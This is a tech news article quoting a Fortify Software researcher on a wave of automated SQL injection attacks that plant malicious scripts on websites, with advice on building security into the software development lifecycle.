Skip to main content

Innovative site developers to blame for the current crop of SQL Web server attacks

Security firm Fortify Software reports that this week's reports of a rash of SQL attacks on Web sites should make software developers sit up and take notice.

"Newswire reports suggest that hundreds of thousands of Web site have been hit by a mass SQL attack. This is symptomatic of hackers developing highly sophisticated and semi-automated attack routines," said Jacob West, Manager of Fortify’s Security Research Group.

West added that “The script or tool behind the attack uses Google to search for sites that include a file type and parameter that appear to often be susceptible to SQL injection and uses that list returned from Google to mount its attack.

The attack uses the SQL injection vulnerability to mount a persistent cross-site scripting attack that embeds malicious JavaScript/HTML in the vulnerable application and infects all visitors to the infected site until it is explicitly identified and removed.”

According to West, the current crop of SQL attacks appears to be the result of sloppy programming on the part of Web site developers.

"Although this wave of attacks targets an application vulnerability that is the result of poor programming, it is indicative of the larger problem that we in the software engineering and security fields need to provide developers with APIs that make getting security right easier and better tools and processes to ensure that the software they build with these APIs is secure.," he said.

West added “SQL injection is a straightforward problem to identify and avoid when compared with other code-level vulnerabilities, but these attacks demonstrate that some organizations building web applications today are still woefully behind the bad guys.

The solution to this and similar problems is a software development lifecycle designed to build security into software from the ground up. Security is a critical attribute during the design, building, testing and deployment phases. Software developed without a full-lifecycle approach and the right tools to support each phase is destined to suffer security compromises like the one seen here“

Désiré has been musing and writing about technology during a career spanning four decades. He dabbled in website building and web hosting when DHTML and frames were en vogue and started writing about the impact of technology on society just before the start of the Y2K hysteria at the turn of the last millennium. Following an eight-year stint at ITProPortal.com where he discovered the joys of global tech-fests, Désiré now heads up TechRadar Pro. Previously he was a freelance technology journalist at Incisive Media, Breakthrough Publishing and Vnunet, and Business Magazine. He also launched and hosted the first Tech Radio Show on Radio Plus.